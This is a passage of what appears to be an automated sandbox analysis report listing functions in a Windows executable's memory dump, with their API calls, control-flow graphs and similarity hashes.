                                                                                              • GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 00320646
                                                                                              • GetProcAddress.KERNEL32(0035A1F0,CryptUnprotectMemory), ref: 00320656
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                              • API String ID: 2141747552-1753850145
                                                                                              • Opcode ID: 52835241185059a2cc2cd89223d8023681ea0799b4a840f714e2972647f05e85
                                                                                              • Instruction ID: 8bb9e982a03bba7ae300dc0eeaad4f6189f6b72879363e3bcf2bf45eb3270613
                                                                                              • Opcode Fuzzy Hash: 52835241185059a2cc2cd89223d8023681ea0799b4a840f714e2972647f05e85
                                                                                              • Instruction Fuzzy Hash: 69E08670804B215ED7335F74B949B42BFE4DF15700F05882DE2D59B151DAB4E4508B50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031AB40 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1043 31ab40-31ab61 call 32ffd0 1046 31ab63-31ab66 1043->1046 1047 31ab6c 1043->1047 1046->1047 1049 31ab68-31ab6a 1046->1049 1048 31ab6e-31ab7f 1047->1048 1050 31ab81 1048->1050 1051 31ab87-31ab91 1048->1051 1049->1048 1050->1051 1052 31ab93 1051->1052 1053 31ab96-31aba3 call 3179e5 1051->1053 1052->1053 1056 31aba5 1053->1056 1057 31abab-31abca CreateFileW 1053->1057 1056->1057 1058 31ac1b-31ac1f 1057->1058 1059 31abcc-31abee GetLastError call 31cf32 1057->1059 1060 31ac23-31ac26 1058->1060 1063 31ac28-31ac2d 1059->1063 1068 31abf0-31ac13 CreateFileW GetLastError 1059->1068 1062 31ac39-31ac3e 1060->1062 1060->1063 1066 31ac40-31ac43 1062->1066 1067 31ac5f-31ac70 1062->1067 1063->1062 1065 31ac2f 1063->1065 1065->1062 1066->1067 1069 31ac45-31ac59 SetFileTime 1066->1069 1070 31ac72-31ac8a call 32192f 1067->1070 1071 31ac8e-31ac99 1067->1071 1068->1060 1072 31ac15-31ac19 1068->1072 1069->1067 1070->1071 1072->1060
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00318243,?,00000005,?,00000011), ref: 0031ABBF
                                                                                              • GetLastError.KERNEL32(?,?,00318243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0031ABCC
                                                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00318243,?,00000005,?), ref: 0031AC02
                                                                                              • GetLastError.KERNEL32(?,?,00318243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0031AC0A
                                                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00318243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0031AC59
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CreateErrorLast$Time
                                                                                              • String ID:
                                                                                              • API String ID: 1999340476-0
                                                                                              • Opcode ID: 50f36461eedadd4737330a19e05ec4ab0985169d522cd338754381791045db70
                                                                                              • Instruction ID: 9486339b12b42c11872ced6ebf7ca9d18169a201b3cfe9bbb1a8a858cd8bcf9f
                                                                                              • Opcode Fuzzy Hash: 50f36461eedadd4737330a19e05ec4ab0985169d522cd338754381791045db70
                                                                                              • Instruction Fuzzy Hash: CA316830549B816FE7369F24DC45BDABBE8BB09321F100B29F5A0861D1C7B1A8D4CBD2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032BEFF Relevance: 7.6, APIs: 5, Instructions: 62COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1102 32beff-32bf16 call 32c324 1105 32bfaf-32bfb0 1102->1105 1106 32bf1c-32bf5e SetEntriesInAclW 1102->1106 1107 32bf60-32bf6d InitializeSecurityDescriptor 1106->1107 1108 32bfad-32bfae 1106->1108 1109 32bf9f-32bfa2 1107->1109 1110 32bf6f-32bf80 SetSecurityDescriptorDacl 1107->1110 1108->1105 1109->1108 1112 32bfa4-32bfa7 LocalFree 1109->1112 1110->1109 1111 32bf82-32bf99 CreateDirectoryW 1110->1111 1111->1109 1112->1108
                                                                                              APIs
                                                                                                • Part of subcall function 0032C324: GetCurrentProcess.KERNEL32(00020008,0032BF14,?,?,?,?,0032BF14,?), ref: 0032C333
                                                                                                • Part of subcall function 0032C324: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0032BF14,?), ref: 0032C33A
                                                                                                • Part of subcall function 0032C324: GetTokenInformation.KERNELBASE(0032BF14,00000001(TokenIntegrityLevel),00000000,00000000,?,?,?,?,?,0032BF14,?), ref: 0032C354
                                                                                                • Part of subcall function 0032C324: GetLastError.KERNEL32(?,?,?,?,0032BF14,?), ref: 0032C35E
                                                                                                • Part of subcall function 0032C324: GetTokenInformation.KERNELBASE(0032BF14,00000001(TokenIntegrityLevel),00000000,?,?,?,?,?,?,?,0032BF14,?), ref: 0032C382
                                                                                                • Part of subcall function 0032C324: CopySid.ADVAPI32(00000044,0032BF14,00000000,?,?,?,?,?,0032BF14,?), ref: 0032C393
                                                                                              • SetEntriesInAclW.ADVAPI32(00000001,11060000,00000000,?,?,?,?), ref: 0032BF56
                                                                                              • InitializeSecurityDescriptor.ADVAPI32(?,00000001,?,?,?), ref: 0032BF65
                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,?,?), ref: 0032BF78
                                                                                              • CreateDirectoryW.KERNELBASE(?,0000000C,?,?,?), ref: 0032BF99
                                                                                              • LocalFree.KERNEL32(?,?,?,?), ref: 0032BFA7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Token$DescriptorInformationProcessSecurity$CopyCreateCurrentDaclDirectoryEntriesErrorFreeInitializeLastLocalOpen
                                                                                              • String ID:
                                                                                              • API String ID: 2740647886-0
                                                                                              • Opcode ID: f839eff8340fb6f17e31c9ba7cbd132d0653634cd6495ed8cdd2c73671a841d2
                                                                                              • Instruction ID: d62820035e42fc0c091c18deba4a7d177fef769c6ca440f1fcb11894203ac2c1
                                                                                              • Opcode Fuzzy Hash: f839eff8340fb6f17e31c9ba7cbd132d0653634cd6495ed8cdd2c73671a841d2
                                                                                              • Instruction Fuzzy Hash: 3121B4B5C00228EADB11CFA5ED44ADEFBBCFF45740F10406AE905E2210DB749A45DFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032C758 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1113 32c758-32c771 PeekMessageW 1114 32c773-32c787 GetMessageW 1113->1114 1115 32c7ac-32c7ae 1113->1115 1116 32c798-32c7a6 TranslateMessage DispatchMessageW 1114->1116 1117 32c789-32c796 IsDialogMessageW 1114->1117 1116->1115 1117->1115 1117->1116
                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0032C769
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0032C77A
                                                                                              • IsDialogMessageW.USER32(00020486,?), ref: 0032C78E
                                                                                              • TranslateMessage.USER32(?), ref: 0032C79C
                                                                                              • DispatchMessageW.USER32(?), ref: 0032C7A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 1266772231-0
                                                                                              • Opcode ID: e9c86e0e3cd4e1ce0a951f2465189349c70236ab841b02f6538cdbd74a0c1344
                                                                                              • Instruction ID: 0399e7e300c40b1f6d14f0bdea48325bd9da5424a845743438557886a6d0e9c1
                                                                                              • Opcode Fuzzy Hash: e9c86e0e3cd4e1ce0a951f2465189349c70236ab841b02f6538cdbd74a0c1344
                                                                                              • Instruction Fuzzy Hash: 51F0DA71D0162AAB8B35ABF6EC4CDEF7FACEE05391B408415B50AD2050E7A4D546CBF0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032BBC0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000050), ref: 0032BBD7
                                                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 0032BC0E
                                                                                                • Part of subcall function 00323316: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013316,0031D523,00000000,.exe,?,?,00000800,?,?,?,00329E5C), ref: 0032332C
                                                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0032BBFE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                              • String ID: EDIT
                                                                                              • API String ID: 4243998846-3080729518
                                                                                              • Opcode ID: 563764ff737bd647dd48c6ccd46afa47116bfb77ed025cf25567e80809f57741
                                                                                              • Instruction ID: d2e76b822df78e03187a8e0e34f5e800cfb134580014016b8c15408e1ed7e19c
                                                                                              • Opcode Fuzzy Hash: 563764ff737bd647dd48c6ccd46afa47116bfb77ed025cf25567e80809f57741
                                                                                              • Instruction Fuzzy Hash: A1F0A732A00738BBDB325665AC05F9FB76CAF46B40F450021FA44F61C0DBA4EA4185F5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00334DA2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00334D53,00000000,?,003740C4,?,?,?,00334EF6,00000004,InitializeCriticalSectionEx,00347424,InitializeCriticalSectionEx), ref: 00334DAF
                                                                                              • GetLastError.KERNEL32(?,00334D53,00000000,?,003740C4,?,?,?,00334EF6,00000004,InitializeCriticalSectionEx,00347424,InitializeCriticalSectionEx,00000000,?,00334CAD), ref: 00334DB9
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00334DE1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID: api-ms-
                                                                                              • API String ID: 3177248105-2084034818
                                                                                              • Opcode ID: d367e67933465b1a1e88ffe0414af6edc12ccd30e7d81fd14dd6ef6f14d2ca61
                                                                                              • Instruction ID: e56cf37035b78491056faf846e457241b46482caec8c4a62b93071769498cc37
                                                                                              • Opcode Fuzzy Hash: d367e67933465b1a1e88ffe0414af6edc12ccd30e7d81fd14dd6ef6f14d2ca61
                                                                                              • Instruction Fuzzy Hash: 95E04F3C284204BBEF221F61EC86B593F98AB01B51F110430FA0DAC0F1DBA1B9909984
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031A9E5 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 0031A9F5
                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0031AA0D
                                                                                              • GetLastError.KERNEL32 ref: 0031AA3F
                                                                                              • GetLastError.KERNEL32 ref: 0031AA5E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                              • String ID:
                                                                                              • API String ID: 2244327787-0
                                                                                              • Opcode ID: fdd24095daf3c524201e0abd43d157cc1cbf4fa28a7cef648b5ee9ea1c367ff2
                                                                                              • Instruction ID: fe639259797d8423fe97342ccd6555ae481a1e8f4ccb59880ca97108f24aaa6e
                                                                                              • Opcode Fuzzy Hash: fdd24095daf3c524201e0abd43d157cc1cbf4fa28a7cef648b5ee9ea1c367ff2
                                                                                              • Instruction Fuzzy Hash: 1E110634901A04EBCF2B5F60D9006FA37ADBF09323F114626F51685190C7749EC0CB53
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0033BEF4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00335281,00000000,00000000,?,0033BE9B,00335281,00000000,00000000,00000000,?,0033C098,00000006,FlsSetValue), ref: 0033BF26
                                                                                              • GetLastError.KERNEL32(?,0033BE9B,00335281,00000000,00000000,00000000,?,0033C098,00000006,FlsSetValue,00348A00,FlsSetValue,00000000,00000364,?,0033A5E7), ref: 0033BF32
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0033BE9B,00335281,00000000,00000000,00000000,?,0033C098,00000006,FlsSetValue,00348A00,FlsSetValue,00000000), ref: 0033BF40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 3177248105-0
                                                                                              • Opcode ID: a1e2f87f9d66ae2c60693972ac0b843fe8eb20391b40543a2d3b51bd3cdb7c1a
                                                                                              • Instruction ID: 4743eff89ac263b4be251209957720d026b59a0a0b4c5e60f6e65be9f7d8fd9b
                                                                                              • Opcode Fuzzy Hash: a1e2f87f9d66ae2c60693972ac0b843fe8eb20391b40543a2d3b51bd3cdb7c1a
                                                                                              • Instruction Fuzzy Hash: 6E01AC366152269BC7234B69AC84B57F79CAF05B61F161620FB1AD7150DB20E800CEE0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032069C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00320627: GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 00320646
                                                                                                • Part of subcall function 00320627: GetProcAddress.KERNEL32(0035A1F0,CryptUnprotectMemory), ref: 00320656
                                                                                              • GetCurrentProcessId.KERNEL32(?,00000200,?,00320697), ref: 0032072A
                                                                                              Strings
                                                                                              • CryptProtectMemory failed, xrefs: 003206E1
                                                                                              • CryptUnprotectMemory failed, xrefs: 00320722
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CurrentProcess
                                                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                              • API String ID: 2190909847-396321323
                                                                                              • Opcode ID: 8d256b5bd6dab5b911c770741e4c3cb715b2bebcf4869b16a2cf193cbece9af3
                                                                                              • Instruction ID: 97592a307b4124cf71c69ed55b1e48f970c22fe13aa272e6c5a861ef538ba6bc
                                                                                              • Opcode Fuzzy Hash: 8d256b5bd6dab5b911c770741e4c3cb715b2bebcf4869b16a2cf193cbece9af3
                                                                                              • Instruction Fuzzy Hash: 98110631900A74ABDB1B9B34AC41A6E3B68EF44764F064115FC416F2A3DA30AD958AE5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031F968 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadStringW.USER32(?,?,00000200,?), ref: 0031F998
                                                                                              • LoadStringW.USER32(?,?,00000200), ref: 0031F9AF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadString
                                                                                              • String ID: p05
                                                                                              • API String ID: 2948472770-574964626
                                                                                              • Opcode ID: 641f72646a65934c8698f8d2a435450a613063379e775ea4e0d6a4e31bcd2a13
                                                                                              • Instruction ID: d9a21be734be5bc321b723bcd36d94a0d6f031fdb9dca9ad2eefc778add6ad78
                                                                                              • Opcode Fuzzy Hash: 641f72646a65934c8698f8d2a435450a613063379e775ea4e0d6a4e31bcd2a13
                                                                                              • Instruction Fuzzy Hash: EFF07436100219BBDF165F55EC04DEB7F6EFF49392B404425FD0996130D63289A0EBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031B20A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0031E79B,00000001,?,?,?,00000000,003266C2,?,?,?), ref: 0031B22E
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,003266C2,?,?,?,?,?,00326184,?), ref: 0031B275
                                                                                              • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0031E79B,00000001,?,?), ref: 0031B2A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite$Handle
                                                                                              • String ID:
                                                                                              • API String ID: 4209713984-0
                                                                                              • Opcode ID: bb57019a59c9042a4a234506a0e1ad6c73b66cba400d3c63c034e3d2d1ac4d95
                                                                                              • Instruction ID: 9c8375d25c96f61f99b7bdda50e71b756ec58ba9b39888a22607d190eb1de37c
                                                                                              • Opcode Fuzzy Hash: bb57019a59c9042a4a234506a0e1ad6c73b66cba400d3c63c034e3d2d1ac4d95
                                                                                              • Instruction Fuzzy Hash: C831F7352043059FDB0ACF10D808BEEB7A9FB89715F05091DF9915B290CB74AD8DCBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031B542 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0031D68B: _wcslen.LIBCMT ref: 0031D691
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0031B405,?,00000001,00000000,?,?), ref: 0031B569
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0031B405,?,00000001,00000000,?,?), ref: 0031B59C
                                                                                              • GetLastError.KERNEL32(?,?,?,?,0031B405,?,00000001,00000000,?,?), ref: 0031B5B9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2260680371-0
